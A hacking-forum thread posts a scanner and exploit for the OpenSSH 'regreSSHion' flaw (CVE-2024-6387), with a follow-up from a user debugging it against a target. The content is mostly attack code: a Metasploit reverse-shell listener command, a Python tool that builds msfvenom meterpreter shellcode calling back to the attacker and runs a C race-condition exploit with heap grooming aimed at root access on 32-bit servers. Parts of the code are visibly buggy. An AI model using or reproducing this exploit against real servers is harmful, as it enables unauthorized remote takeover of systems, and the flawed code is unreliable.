Welcome to Dark Area

Explore, Secure, Evolve – IT, Cybersecurity & Ethical Hacking

ATTENTION! Due to account issues, our mails are going into spam. Please, do not forget to check the spam folder for confirmation mails.

Register…

CVE-2024-6387 - RegreSSHion - PoC/Exploit

  • Thread starter Dark
  • Start date
  • Replies 2
  • Views 600
  • Important Notice

    This site provides security information, including vulnerabilities and exploits, exclusively for educational purposes. Users are responsible for ensuring their activities comply with all applicable laws and regulations. The site owner disclaims any liability for misuse of the content.

Dark

Owner

Joined
Mar 21, 2024
Messages
40
CVE-2024-6387 - RegreSSHion - OpenSSH Unauthenticated RCE

dxn74bb.jpg


A high-severity remote code execution (RCE) vulnerability has been found in OpenSSH's server (CVE-2024-6387) by the research team of Qualys.

Vulnerable & Patched versions is available in source code.


Update Notes on PoC ->

1. This PoC is available only for 32-bit OpenSSH Servers

2. I forgot to share 7etsuo-regreSSHion.c which is used in line 297, 304, 307, 312, 314 and causes errors.

7etsuo-regreSSHion.c added under Python code.


First-time exploiting steps:

1. msfconsole -q -x "use exploit/multi/handler; set PAYLOAD linux/x64/meterpreter/reverse_tcp; set LHOST {yourip}; set LPORT 9999; exploit -j"

2. For example: python3 CVE-2024-6387.py scan -T example.com -p 22


PoC/Exploit:


Python:
#!/usr/bin/env python3

import socket
import argparse
import ipaddress
import threading
from queue import Queue
import csv
import json
import os
import time
import ctypes



class Color:
    GREEN = '\033[92m'
    RED = '\033[91m'
    YELLOW = '\033[93m'
    CYAN = '\033[96m'
    ORANGE = "\033[33m"
    RESET = '\033[0m'

version = "1.0"


# Scan
def resolve_hostname(hostname):
    try:
        addr_info = socket.getaddrinfo(hostname, None)
        addresses = [addr[4][0] for addr in addr_info]
        return addresses
    except socket.gaierror:
        print(f"[-] Hostname could not be resolved: {hostname}")
        return []

# Initialize Socket Connection
def create_socket(ip, port, timeout):
    try:
        family = socket.AF_INET6 if ':' in ip else socket.AF_INET
        sock = socket.socket(family, socket.SOCK_STREAM)
        sock.settimeout(timeout)
        sockconn = (ip,port)
        sock.connect((sockconn))
        return sock
    except Exception:
        return None

# Grabs SSH_Banner
def get_ssh_banner(sock, use_help_request):
    try:
        banner = sock.recv(1024).decode(errors='ignore').strip()
        if banner or not use_help_request:
            return banner
        helpstr = "HELP\n"
        sock.sendall(helpstr.encode())
        banner = sock.recv(1024).decode(errors='ignore').strip()
        return banner
    except Exception as e:
        return str(e)
    finally:
        sock.close()

# Initiate Vulnerability Scan
def check_vulnerability(ip, port, timeout, gracetimecheck, result_queue):
    sshsock = create_socket(ip, port, timeout)
    if not sshsock:
        result_queue.put((ip,port,'closed',"Port closed"))
        return
 
    banner = (get_ssh_banner(sshsock,use_help_request=None))
    if not banner:
        result_queue.put((ip,port,'failed',f"(Failed to grab the SSH-Banner: {banner})"))
        return
    elif not (banner.split('-')[2]).startswith("OpenSSH"):
        result_queue.put((ip,port,'unknown',f"(banner: {banner})"))
        return

    vulnerable_versions = [
        'OpenSSH_1.2.2p1',
        'OpenSSH_1.2.3p1',
        'OpenSSH_2.1.1p2',
        'OpenSSH_2.1.1p3',
        'OpenSSH_2.0.0p1',
        'OpenSSH_2.3.0p1',
        'OpenSSH_2.5.1p1',
        'OpenSSH_2.5.1p2',
        'OpenSSH_2.5.2p2',
        'OpenSSH_2.9',
        'OpenSSH_2.9p1',
        'OpenSSH_2.9.9',
        'OpenSSH_2.9.9p1',
        'OpenSSH_2.9p2',
        'OpenSSH_3.0',
        'OpenSSH_3.0p1',
        'OpenSSH_3.0.1',
        'OpenSSH_3.0.1p1',
        'OpenSSH_3.0.2p1',
        'OpenSSH_3.1',
        'OpenSSH_3.1p1',
        'OpenSSH_3.2.2',
        'OpenSSH_3.2.2p1',
        'OpenSSH_3.2.3',
        'OpenSSH_3.2.3p1',
        'OpenSSH_3.3',
        'OpenSSH_3.3p1',
        'OpenSSH_3.4',
        'OpenSSH_3.4p1',
        'OpenSSH_3.5',
        'OpenSSH_3.5p1',
        'OpenSSH_3.6',
        'OpenSSH_3.6p1',
        'OpenSSH_3.6.1',
        'OpenSSH_3.6.1p1',
        'OpenSSH_3.6.1p2',
        'OpenSSH_3.7',
        'OpenSSH_3.7p1',
        'OpenSSH_3.7.1',
        'OpenSSH_3.7.1p1',
        'OpenSSH_3.7.1p2',
        'OpenSSH_3.8',
        'OpenSSH_3.8p1',
        'OpenSSH_3.8.1',
        'OpenSSH_3.8.1p1',
        'OpenSSH_3.9',
        'OpenSSH_3.9p1',
        'OpenSSH_4.0',
        'OpenSSH_4.1',
        'OpenSSH_4.2',
        'OpenSSH_4.2p1',
        'OpenSSH_4.3',
        'OpenSSH_4.3p1',
        'OpenSSH_4.3p2',
        'OpenSSH_4.4',
        'OpenSSH_4.4p1',
        'OpenSSH_8.5',
        'OpenSSH_8.5p1',
        'OpenSSH_8.6',
        'OpenSSH_8.6p1',
        'OpenSSH_8.7',
        'OpenSSH_8.7p1',
        'OpenSSH_8.8',
        'OpenSSH_8.8p1',
        'OpenSSH_8.9',
        'OpenSSH_8.91',
        'OpenSSH_9.0',
        'OpenSSH_9.0p1',
        'OpenSSH_9.1',
        'OpenSSH_9.1p1',
        'OpenSSH_9.2',
        'OpenSSH_9.2p1',
        'OpenSSH_9.3',
        'OpenSSH_9.3p1',
        'OpenSSH_9.4',
        'OpenSSH_9.4p1',
        'OpenSSH_9.5',
        'OpenSSH_9.5p1',
        'OpenSSH_9.6',
        'OpenSSH_9.6p1',
        'OpenSSH_9.7'
        'OpenSSH_9.7p1'
    ]

    patched_versions = [
        'OpenSSH_8.9p1 Ubuntu-3ubuntu0.10',
        'OpenSSH_9.3p1 Ubuntu-3ubuntu3.6',
        'OpenSSH_9.6p1 Ubuntu-3ubuntu13.3',
        'OpenSSH_9.3p1 Ubuntu-1ubuntu3.6',
        'OpenSSH_9.2p1 Debian-2+deb12u3',
        'OpenSSH_8.4p1 Debian-5+deb11u3',
        'OpenSSH_9.7p1 Debian-7'
    ]

    finalbanner = (banner.split('-')[2]).split(' ')[0]
    distroversion = banner.split('-')[2]+(banner.split('-')[3])

    if any(version in finalbanner for version in vulnerable_versions) and distroversion not in patched_versions:
        if gracetimecheck:
            time.sleep(gracetimecheck)
            sshsock = create_socket(ip, port, timeout)
            if sshsock:
                banner_after_wait = get_ssh_banner(sshsock)
                if banner == banner_after_wait:
                    result_queue.put((ip, port, 'vulnerable', f"(running {banner}) with LoginGraceTime mitigation detected (session stayed open for {gracetimecheck} seconds)"))
                else:
                    result_queue.put((ip, port, 'vulnerable', f"(running {banner})"))
            else:
                result_queue.put((ip, port, 'vulnerable', f"(running {banner})"))
        else:
            result_queue.put((ip, port, 'vulnerable', f"(running {banner})"))
    else:
        result_queue.put((ip, port, 'not_vulnerable', f"(running {banner})"))

# Initiate Port Scan
def scan_ports(targets, port, timeout, gracetimecheck, output_format=None, output_file=None,):
    """Scan ports on multiple targets and optionally write results to a file."""
    ips = []
    for target in targets:
        try:
            with open(target, 'r') as file:
                ips.extend(file.readlines())
        except IOError:
            if '/' in target:
                try:
                    network = ipaddress.ip_network(target, strict=False)
                    ips.extend([str(ip) for ip in network.hosts()])
                except ValueError:
                    print(f"{Color.RED}[-] Invalid: {target}{Color.RESET}")
            else:
                ips.append(target.strip())

    result_queue = Queue()
    threads = []

    for ip in ips:
        ip = ip.strip()
        thread = threading.Thread(target=check_vulnerability, args=(ip, port, timeout, gracetimecheck, result_queue ))
        thread.start()
        threads.append(thread)

    for thread in threads:
        thread.join()

    total_scanned = len(ips)
    closed_ports = 0
    unknown = []
    not_vulnerable = []
    vulnerable = []

    while not result_queue.empty():
        ip, port, status, message = result_queue.get()
        if status == 'closed':
            closed_ports += 1
        elif status == 'unknown':
            unknown.append((ip, message))
        elif status == 'vulnerable':
            vulnerable.append((ip, message))
        elif status == 'not_vulnerable':
            not_vulnerable.append((ip, message))
        else:
            print(f"{Color.YELLOW}[!] Server at {ip}:{port} {message}{Color.RESET}")
   
    print(f"\n🚨Servers likely vulnerable: {len(vulnerable)}")
    for ip, msg in vulnerable:
         print(f"   [+] Server at {Color.RED}{ip}:{port}{Color.RESET} {msg}")
    print(f"\n🛡️ Servers not vulnerable: {len(not_vulnerable)}")
    for ip, msg in not_vulnerable:
        print(f"   [+] Server at {Color.GREEN}{ip}:{port}{Color.RESET} {msg}")
    print(f"\n⚠️ Servers with unknown SSH version: {len(unknown)}")
    for ip, msg in unknown:
        print(f"   [+] Server at {Color.ORANGE}{ip}:{port}{Color.RESET} {msg}")

    print(f"\n{Color.CYAN}Summary{Color.RESET}:")
    print(f"\n📊 Total scanned hosts: {total_scanned}")
    print(f"\n🚨 {Color.RED}Total vulnerable hosts: {len(vulnerable)}{Color.RESET}")
    print(f"\n🛡️ {Color.GREEN} Total not vulnerable hosts: {len(unknown)}{Color.RESET}")
    print(f"\n⚠️ {Color.ORANGE} Total unknown hosts: {len(not_vulnerable)}{Color.RESET}")
    print(f"\n🔒 Servers with port {port} closed: {closed_ports}")

 
    if output_format and output_file:
        if output_format == 'csv':
            with open(output_file, 'w', newline='') as csvfile:
                csv_writer = csv.writer(csvfile)
                csv_writer.writerow(['IP', 'Status', 'Message'])
                for ip, msg in not_vulnerable:
                    csv_writer.writerow([ip, '[-] No vulnerable server found', msg])
                for ip, msg in vulnerable:
                    csv_writer.writerow([ip, '[+] Vulnerable server found', msg])
                csvfile.flush()
            print(f"\n{Color.CYAN}✅ Results saved to {output_file} in CSV format.{Color.RESET}")
 
        elif output_format == 'txt':
            with open(output_file, 'w') as txtfile:
                txtfile.write(f"No vulnerable server found: {len(not_vulnerable)}\n")
                for ip, msg in not_vulnerable:
                    txtfile.write(f"   [+] No vulnerable server found at {ip} {msg}\n")
                txtfile.write(f"\nVunerable server found: {len(vulnerable)}\n")
                for ip, msg in vulnerable:
                    txtfile.write(f"   [+] Vulnerable server found at {ip} {msg}\n")
            print(f"\n{Color.CYAN}✅ Results saved to {output_file} in TXT format.{Color.RESET}")

        elif output_format == 'json':
            output_dict = {
                '[-] No vulnerable server found': [{ip: msg} for ip, msg in not_vulnerable],
                '[+] Vulnerable server found': [{ip: msg} for ip, msg in vulnerable]
            }
            with open(output_file, 'w') as jsonfile:
                json.dump(output_dict, jsonfile, indent=4)
            print(f"\n{Color.CYAN}✅ Results saved to {output_file} in JSON format.{Color.RESET}")

# Create Exploit
def create_exploit(nic):
    print(f"{Color.GREEN}[+] Creating exploit...{Color.RESET}")
    ip = os.popen(f'ip addr show {nic}').read().split("inet ")[1].split("/")[0]

    cmd1 = 'cp 7etsuo-regreSSHion.c 7etsuo-regreSSHion-ex.c'
    os.system(cmd1)
    os.sync()
    #msfvenom is required when creating the exploit / You can use a different script here to initiate your code
    cmd2 = (f'msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST={ip} LPORT=9999 -f c -v shellcode')
    output = (os.popen(cmd2).read())

    with open('7etsuo-regreSSHion-ex.c', 'r') as file:
        data = file.readlines()
        data[49] = f'{output}\n'
    with open('7etsuo-regreSSHion-ex.c', 'w') as file:
        file.writelines(data)
        print()
        file.close()

    cmd3 = (f'gcc -shared -o exploit.so -fPIC 7etsuo-regreSSHion-ex.c')
    os.system(cmd3)
    os.remove('7etsuo-regreSSHion-ex.c')



def exploit_vulnerability(targets, port, nic):
    """Exploit vulnerability on vulnerable servers."""
    print(f"{Color.GREEN}Exploiting vulnerabilities...{Color.RESET}")

    targets = ','.join(targets)

    # Create the exploit
    create_exploit(nic)

    # Call the C function
    if os.path.isfile('exploit.so'):
        lib = ctypes.CDLL('./exploit.so')
        lib.exploit_vulnerability.argtypes = [ctypes.c_char_p, ctypes.c_int]
        lib.exploit_vulnerability.restype = ctypes.c_int
        result = lib.exploit_vulnerability(targets.encode(), port)
        if result == 0:
            print("Exploitation successful!")
        else:
            print("Exploitation failed.")
    else:
        print("Cannot initiate exploitation, due to exploit.so no created! Please create exploit.so first!")

def initiate_exploit():
    print("Trying to exploit CVE-2024-6387...")
 

def main():
    banner = rf"""{Color.GREEN}                                            
________                              ______________________  _______              
___  __ \_____ _______ ______________ __  ___/__  ___/___  / / /___(_)______ _______
__  /_/ /_  _ \__  __ `/__  ___/_  _ \_____ \ _____ \ __  /_/ / __  / _  __ \__  __ \
_  _, _/ /  __/_  /_/ / _  /    /  __/____/ / ____/ / _  __  /  _  /  / /_/ /_  / / /
/_/ |_|  \___/ _\__, /  /_/     \___/ /____/  /____/  /_/ /_/   /_/   \____/ /_/ /_/
               /____/                                                              
                                                                                                             
   ReggreSSHion CVE-2024-6387 Vulnerability Checker / Exploiter
   {version} - Optimized by @Kz, remastered by Dark
    {Color.RESET}"""
    parser = argparse.ArgumentParser(description="Allows to scan for the RegreSSHion (CVE-2024-6387) vulnerability and perform exploitation.",
                                    epilog='Example usage: CVE-2024-6387.py -s <targets> -p <port> -t <timeout> -o <csv/txt/json> -f <output-file>')
    print(banner)
    parser.add_argument("mode", nargs='?', choices=['scan','exploit'], help="Selecting the method by user choice. Create: Creates exploit.so Scan: Scans for vulnerability Exploit: Exploits vulnerability")
    parser.add_argument("-T","--targets", nargs='+', help="IP addresses, domain names, file paths containing IP addresses, or CIDR network ranges.")
    parser.add_argument("-f", "--outputfile", help="File to save results to. (e.q: result.json)")
    parser.add_argument("-g", "--gracetimecheck", nargs='?', const=120, type=int, help="Time in seconds to wait after identifying the version to check for LoginGraceTime mitigation (default: 120 seconds).")
    parser.add_argument("-n", "--nic", default='eth0', help="Your Network NIC")
    parser.add_argument("-o", "--output", choices=['csv', 'txt', 'json'], help="Output format for results.")
    parser.add_argument("-p", "--port", type=int, default=22, help="Port number to check or exploit (default: 22).")
    parser.add_argument("-s", "--speed", type=int, default=10, help="Number of threads to increase race condition chances")
    parser.add_argument("-t", "--timeout", type=float, default=1.0, help="Connection timeout in seconds (default: 1 second).")

    #Initialize Parser and assign variable to parsed arguments
    args = parser.parse_args()
    mode = args.mode
    targets = args.targets
    port = args.port
    timeout = args.timeout
    nic = args.nic
    gracetimecheck = args.gracetimecheck

    #determine the mode that is used scan or exploit
    if mode == 'scan':
        if args.targets is not None:
            output_format = args.output if args.output else None
            output_file = args.outputfile if args.outputfile else None
            scan_ports(targets, port, timeout, gracetimecheck, output_format, output_file)
        else:
            print("Please specify --targets (-T) in order to use this command")
    elif mode == 'exploit':
        if args.targets and args.nic is not None:
            exploit_vulnerability(targets,port,nic)
        else:
            print("Please specify both --targets (-T) and --nic (-n) in order to use this command")
    else:
        print("Please specify either scan or exploit option. \n")
        print(f"Example: CVE-2024-6387.py scan <targets> -p <port>")

if __name__ == "__main__":
    main()


C:
/** 7etsuo-regreSSHion.c
 * -------------------------------------------------------------------------
 * SSH-2.0-OpenSSH_9.2p1 Exploit
 * -------------------------------------------------------------------------
 *
 * Exploit Title  : SSH Exploit for CVE-2024-6387 (regreSSHion)
 * Author         : 7etsuo
 * Date           : 2024-07-01
 *
 * Description:
 * Targets a signal handler race condition in OpenSSH's
 * server (sshd) on glibc-based Linux systems. It exploits a vulnerability
 * where the SIGALRM handler calls async-signal-unsafe functions, leading
 * to rce as root.
 *
 * Notes:
 * 1. Shellcode        : Replace placeholder with actual payload.
 * 2. GLIBC_BASES      : Needs adjustment for specific target systems.
 * 3. Timing parameters: Fine-tune based on target system responsiveness.
 * 4. Heap layout      : Requires tweaking for different OpenSSH versions.
 * 5. File structure offsets: Verify for the specific glibc version.
 * -------------------------------------------------------------------------
 */

#include <stdlib.h>
#include <unistd.h>
#include <time.h>
#include <string.h>
#include <errno.h>
#include <fcntl.h>
#include <stdint.h>
#include <stdio.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <time.h>



#define MAX_PACKET_SIZE (256 * 1024)
#define LOGIN_GRACE_TIME 120
#define MAX_STARTUPS 100
#define CHUNK_ALIGN(s) (((s) + 15) & ~15)

// Possible glibc base addresses (for ASLR bypass)
uint64_t GLIBC_BASES[] = { 0xb7200000, 0xb7400000 };
int NUM_GLIBC_BASES = sizeof(GLIBC_BASES) / sizeof(GLIBC_BASES[0]);

// Shellcode placeholder (replace with actual shellcode)
unsigned char shellcode[] = "\x90\x90\x90\x90";

int setup_connection(const char *ip, int port);
void send_packet(int sock, unsigned char packet_type,
                 const unsigned char *data, size_t len);
void prepare_heap(int sock);
void time_final_packet(int sock, double *parsing_time);
int attempt_race_condition(int sock, double parsing_time,
                           uint64_t glibc_base);
double measure_response_time(int sock, int error_type);
void create_public_key_packet(unsigned char *packet, size_t size,
                              uint64_t glibc_base);
void create_fake_file_structure(unsigned char *data, size_t size,
                                uint64_t glibc_base);
void send_ssh_version(int sock);
int receive_ssh_version(int sock);
void send_kex_init(int sock);
int receive_kex_init(int sock);
int perform_ssh_handshake(int sock);

int exploit_vulnerability(const char *targets, int port) {
    double parsing_time = 0;
    int success = 0;

    srand(time(NULL));

    // Attempt exploitation for each possible glibc base address
    for (int base_idx = 0; base_idx < NUM_GLIBC_BASES && !success; base_idx++) {
        uint64_t glibc_base = GLIBC_BASES[base_idx];
        printf("Attempting exploitation with glibc base: 0x%lx\n", glibc_base);

        // The advisory mentions "~10,000 tries on average"
        for (int attempt = 0; attempt < 20000 && !success; attempt++) {
            if (attempt % 1000 == 0) {
                printf("Attempt %d of 20000\n", attempt);
            }

            int sock = setup_connection(targets, port);
            if (sock < 0) {
                fprintf(stderr, "Failed to establish connection, attempt %d\n", attempt);
                continue;
            }

            if (perform_ssh_handshake(sock) < 0) {
                fprintf(stderr, "SSH handshake failed, attempt %d\n", attempt);
                close(sock);
                continue;
            }

            prepare_heap(sock);
            time_final_packet(sock, &parsing_time);

            if (attempt_race_condition(sock, parsing_time, glibc_base)) {
                printf("Possible exploitation success on attempt %d with glibc base 0x%lx!\n",
                       attempt, glibc_base);
                success = 1;
                break;
            }

            close(sock);
            usleep(100000); // 100ms delay between attempts, as mentioned in the advisory
        }
    }

    return !success;
}

int main(int argc, char *argv[]) {
    if (argc != 3) {
        fprintf(stderr, "Usage: %s <ip> <port>\n", argv[0]);
        exit(1);
    }

    const char *ip = argv[1];
    int port = atoi(argv[2]);

    return exploit_vulnerability(ip, port);
}


int setup_connection (const char *ip, int port){
  int sock = socket (AF_INET, SOCK_STREAM, 0);
  if (sock < 0)
    {
      perror ("socket");
      return -1;
    }

  struct sockaddr_in server_addr;
  memset (&server_addr, 0, sizeof (server_addr));
  server_addr.sin_family = AF_INET;
  server_addr.sin_port = htons (port);
  if (inet_pton (AF_INET, ip, &server_addr.sin_addr) <= 0)
    {
      perror ("inet_pton");
      close (sock);
      return -1;
    }

  if (connect (sock, (struct sockaddr *)&server_addr, sizeof (server_addr))
      < 0)
    {
      perror ("connect");
      close (sock);
      return -1;
    }

  // Set socket to non-blocking mode
  int flags = fcntl (sock, F_GETFL, 0);
  fcntl (sock, F_SETFL, flags | O_NONBLOCK);

  return sock;
}

void
send_packet (int sock, unsigned char packet_type, const unsigned char *data,
             size_t len)
{
  unsigned char packet[MAX_PACKET_SIZE];
  size_t packet_len = len + 5;

  packet[0] = (packet_len >> 24) & 0xFF;
  packet[1] = (packet_len >> 16) & 0xFF;
  packet[2] = (packet_len >> 8) & 0xFF;
  packet[3] = packet_len & 0xFF;
  packet[4] = packet_type;

  memcpy (packet + 5, data, len);

  if (send (sock, packet, packet_len, 0) < 0)
    {
      perror ("send_packet");
    }
}

void
send_ssh_version (int sock)
{
  const char *ssh_version = "SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.1\r\n";
  if (send (sock, ssh_version, strlen (ssh_version), 0) < 0)
    {
      perror ("send ssh version");
    }
}

int
receive_ssh_version (int sock)
{
  char buffer[256];
  ssize_t received;
  do
    {
      received = recv (sock, buffer, sizeof (buffer) - 1, 0);
    }
  while (received < 0 && (errno == EWOULDBLOCK || errno == EAGAIN));

  if (received > 0)
    {
      buffer[received] = '\0';
      printf ("Received SSH version: %s", buffer);
      return 0;
    }
  else if (received == 0)
    {
      fprintf (stderr, "Connection closed while receiving SSH version\n");
    }
  else
    {
      perror ("receive ssh version");
    }
  return -1;
}

void
send_kex_init (int sock)
{
  unsigned char kexinit_payload[36] = { 0 };
  send_packet (sock, 20, kexinit_payload, sizeof (kexinit_payload));
}

int
receive_kex_init (int sock)
{
  unsigned char buffer[1024];
  ssize_t received;
  do
    {
      received = recv (sock, buffer, sizeof (buffer), 0);
    }
  while (received < 0 && (errno == EWOULDBLOCK || errno == EAGAIN));

  if (received > 0)
    {
      printf ("Received KEX_INIT (%zd bytes)\n", received);
      return 0;
    }
  else if (received == 0)
    {
      fprintf (stderr, "Connection closed while receiving KEX_INIT\n");
    }
  else
    {
      perror ("receive kex init");
    }
  return -1;
}

int
perform_ssh_handshake (int sock)
{
  send_ssh_version (sock);
  if (receive_ssh_version (sock) < 0)
    return -1;
  send_kex_init (sock);
  if (receive_kex_init (sock) < 0)
    return -1;
  return 0;
}

void
prepare_heap (int sock)
{
  // Packet a: Allocate and free tcache chunks
  for (int i = 0; i < 10; i++)
    {
      unsigned char tcache_chunk[64];
      memset (tcache_chunk, 'A', sizeof (tcache_chunk));
      send_packet (sock, 5, tcache_chunk, sizeof (tcache_chunk));
      // These will be freed by the server, populating tcache
    }

  // Packet b: Create 27 pairs of large (~8KB) and small (320B) holes
  for (int i = 0; i < 27; i++)
    {
      // Allocate large chunk (~8KB)
      unsigned char large_hole[8192];
      memset (large_hole, 'B', sizeof (large_hole));
      send_packet (sock, 5, large_hole, sizeof (large_hole));

      // Allocate small chunk (320B)
      unsigned char small_hole[320];
      memset (small_hole, 'C', sizeof (small_hole));
      send_packet (sock, 5, small_hole, sizeof (small_hole));
    }

  // Packet c: Write fake headers, footers, vtable and _codecvt pointers
  for (int i = 0; i < 27; i++)
    {
      unsigned char fake_data[4096];
      create_fake_file_structure (fake_data, sizeof (fake_data),
                                  GLIBC_BASES[0]);
      send_packet (sock, 5, fake_data, sizeof (fake_data));
    }

  // Packet d: Ensure holes are in correct malloc bins (send ~256KB string)
  unsigned char large_string[MAX_PACKET_SIZE - 1];
  memset (large_string, 'E', sizeof (large_string));
  send_packet (sock, 5, large_string, sizeof (large_string));
}

void
create_fake_file_structure (unsigned char *data, size_t size,
                            uint64_t glibc_base)
{
  memset (data, 0, size);

  struct
  {
    void *_IO_read_ptr;
    void *_IO_read_end;
    void *_IO_read_base;
    void *_IO_write_base;
    void *_IO_write_ptr;
    void *_IO_write_end;
    void *_IO_buf_base;
    void *_IO_buf_end;
    void *_IO_save_base;
    void *_IO_backup_base;
    void *_IO_save_end;
    void *_markers;
    void *_chain;
    int _fileno;
    int _flags;
    int _mode;
    char _unused2[40];
    void *_vtable_offset;
  } *fake_file = (void *)data;

  // Set _vtable_offset to 0x61 as described in the advisory
  fake_file->_vtable_offset = (void *)0x61;

  // Set up fake vtable and _codecvt pointers
  *(uint64_t *)(data + size - 16)
      = glibc_base + 0x21b740; // fake vtable (_IO_wfile_jumps)
  *(uint64_t *)(data + size - 8) = glibc_base + 0x21d7f8; // fake _codecvt
}

void
time_final_packet (int sock, double *parsing_time)
{
  double time_before = measure_response_time (sock, 1);
  double time_after = measure_response_time (sock, 2);
  *parsing_time = time_after - time_before;

  printf ("Estimated parsing time: %.6f seconds\n", *parsing_time);
}

double
measure_response_time (int sock, int error_type)
{
  unsigned char error_packet[1024];
  size_t packet_size;

  if (error_type == 1)
    {
      // Error before sshkey_from_blob
      packet_size = snprintf ((char *)error_packet, sizeof (error_packet),
                              "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC3");
    }
  else
    {
      // Error after sshkey_from_blob
      packet_size = snprintf ((char *)error_packet, sizeof (error_packet),
                              "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAAAQQDZy9");
    }

  struct timespec start, end;
  clock_gettime (CLOCK_MONOTONIC, &start);

  send_packet (sock, 50, error_packet,
               packet_size); // SSH_MSG_USERAUTH_REQUEST

  char response[1024];
  ssize_t received;
  do
    {
      received = recv (sock, response, sizeof (response), 0);
    }
  while (received < 0 && (errno == EWOULDBLOCK || errno == EAGAIN));

  clock_gettime (CLOCK_MONOTONIC, &end);

  double elapsed
      = (end.tv_sec - start.tv_sec) + (end.tv_nsec - start.tv_nsec) / 1e9;
  return elapsed;
}

void
create_public_key_packet (unsigned char *packet, size_t size,
                          uint64_t glibc_base)
{
  memset (packet, 0, size);

  size_t offset = 0;
  for (int i = 0; i < 27; i++)
    {
      // malloc(~4KB) - This is for the large hole
      *(uint32_t *)(packet + offset) = CHUNK_ALIGN (4096);
      offset += CHUNK_ALIGN (4096);

      // malloc(304) - This is for the small hole (potential FILE structure)
      *(uint32_t *)(packet + offset) = CHUNK_ALIGN (304);
      offset += CHUNK_ALIGN (304);
    }

  // Add necessary headers for the SSH public key format
  memcpy (packet, "ssh-rsa ", 8);

  // Place shellcode in the heap via previous allocations
  memcpy (packet + CHUNK_ALIGN (4096) * 13 + CHUNK_ALIGN (304) * 13, shellcode,
          sizeof (shellcode));

  // Set up the fake FILE structures within the packet
  for (int i = 0; i < 27; i++)
    {
      create_fake_file_structure (packet + CHUNK_ALIGN (4096) * (i + 1)
                                      + CHUNK_ALIGN (304) * i,
                                  CHUNK_ALIGN (304), glibc_base);
    }
}

int
attempt_race_condition (int sock, double parsing_time, uint64_t glibc_base)
{
  unsigned char final_packet[MAX_PACKET_SIZE];
  create_public_key_packet (final_packet, sizeof (final_packet), glibc_base);

  // Send all but the last byte
  if (send (sock, final_packet, sizeof (final_packet) - 1, 0) < 0)
    {
      perror ("send final packet");
      return 0;
    }

  // Precise timing for last byte
  struct timespec start, current;
  clock_gettime (CLOCK_MONOTONIC, &start);

  while (1)
    {
      clock_gettime (CLOCK_MONOTONIC, &current);
      double elapsed = (current.tv_sec - start.tv_sec)
                       + (current.tv_nsec - start.tv_nsec) / 1e9;
      if (elapsed >= (LOGIN_GRACE_TIME - parsing_time - 0.001))
        { // 1ms before SIGALRM
          if (send (sock, &final_packet[sizeof (final_packet) - 1], 1, 0) < 0)
            {
              perror ("send last byte");
              return 0;
            }
          break;
        }
    }

  // Check for successful exploitation
  char response[1024];
  ssize_t received = recv (sock, response, sizeof (response), 0);
  if (received > 0)
    {
      printf ("Received response after exploit attempt (%zd bytes)\n",
              received);
      // Analyze response to determine if we hit the "large" race window
      if (memcmp (response, "SSH-2.0-", 8) != 0)
        {
          printf ("Possible hit on 'large' race window\n");
          return 1;
        }
    }
  else if (received == 0)
    {
      printf (
          "Connection closed by server - possible successful exploitation\n");
      return 1;
    }
  else if (errno == EWOULDBLOCK || errno == EAGAIN)
    {
      printf ("No immediate response from server - possible successful "
              "exploitation\n");
      return 1;
    }
  else
    {
      perror ("recv");
    }
  return 0;
}

int
perform_exploit (const char *ip, int port)
{
  int success = 0;
  double parsing_time = 0;
  double timing_adjustment = 0;

  for (int base_idx = 0; base_idx < NUM_GLIBC_BASES && !success; base_idx++)
    {
      uint64_t glibc_base = GLIBC_BASES[base_idx];
      printf ("Attempting exploitation with glibc base: 0x%lx\n", glibc_base);

      for (int attempt = 0; attempt < 10000 && !success; attempt++)
        {
          if (attempt % 1000 == 0)
            {
              printf ("Attempt %d of 10000\n", attempt);
            }

          int sock = setup_connection (ip, port);
          if (sock < 0)
            {
              fprintf (stderr, "Failed to establish connection, attempt %d\n",
                       attempt);
              continue;
            }

          if (perform_ssh_handshake (sock) < 0)
            {
              fprintf (stderr, "SSH handshake failed, attempt %d\n", attempt);
              close (sock);
              continue;
            }

          prepare_heap (sock);
          time_final_packet (sock, &parsing_time);

          // Implement feedback-based timing strategy
          parsing_time += timing_adjustment;

          if (attempt_race_condition (sock, parsing_time, glibc_base))
            {
              printf ("Possible exploitation success on attempt %d with glibc "
                      "base 0x%lx!\n",
                      attempt, glibc_base);
              success = 1;
              // In a real exploit, we would now attempt to interact with the
              // shell
            }
          else
            {
              // Adjust timing based on feedback
              timing_adjustment += 0.00001; // Small incremental adjustment
            }

          close (sock);
          usleep (100000); // 100ms delay between attempts, as mentioned in the
                           // advisory
        }
    }

  return success;
}
 
Last edited:

j4ck

New Member

Joined
Nov 9, 2024
Messages
1
Hi, Dark.
I stucked here.
already had 7etsuo-regreSSHion.c file and this python code.
also installed gcc, msfvenom, python3
before this error, occurred with the '-v shellcode' in the cmd2 variable, so I changed it to '-v new_shellcode'.

Can you tell me what the problem is?

command:
python3 cve20246387-ssh-2.py exploit -T x.x.x.x -t 10 -o csv -f eom.csv

output:
Exploiting vulnerabilities...
[+] Creating exploit...
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 130 bytes
Final size of c file: 584 bytes

Traceback (most recent call last):
File "/root/cve20246387-ssh-2.py", line 419, in <module>
main()
File "/root/cve20246387-ssh-2.py", line 411, in main
exploit_vulnerability(targets, port, nic)
File "/root/cve20246387-ssh-2.py", line 335, in exploit_vulnerability
lib = ctypes.CDLL('./exploit.so')
^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/usr/lib/python3.11/ctypes/__init__.py", line 376, in __init__
self._handle = _dlopen(self._name, mode)
^^^^^^^^^^^^^^^^^^^^^^^^^
OSError: ./exploit.so: undefined symbol: send_ssh_version

Thank you.
 

Dark

Owner

Joined
Mar 21, 2024
Messages
40
Hi, Dark.
I stucked here.
already had 7etsuo-regreSSHion.c file and this python code.
also installed gcc, msfvenom, python3
before this error, occurred with the '-v shellcode' in the cmd2 variable, so I changed it to '-v new_shellcode'.

Can you tell me what the problem is?

command:
python3 cve20246387-ssh-2.py exploit -T x.x.x.x -t 10 -o csv -f eom.csv

output:
Exploiting vulnerabilities...
[+] Creating exploit...
[-] No platform was selected, choosing Msf::Module::platform::Linux from the payload
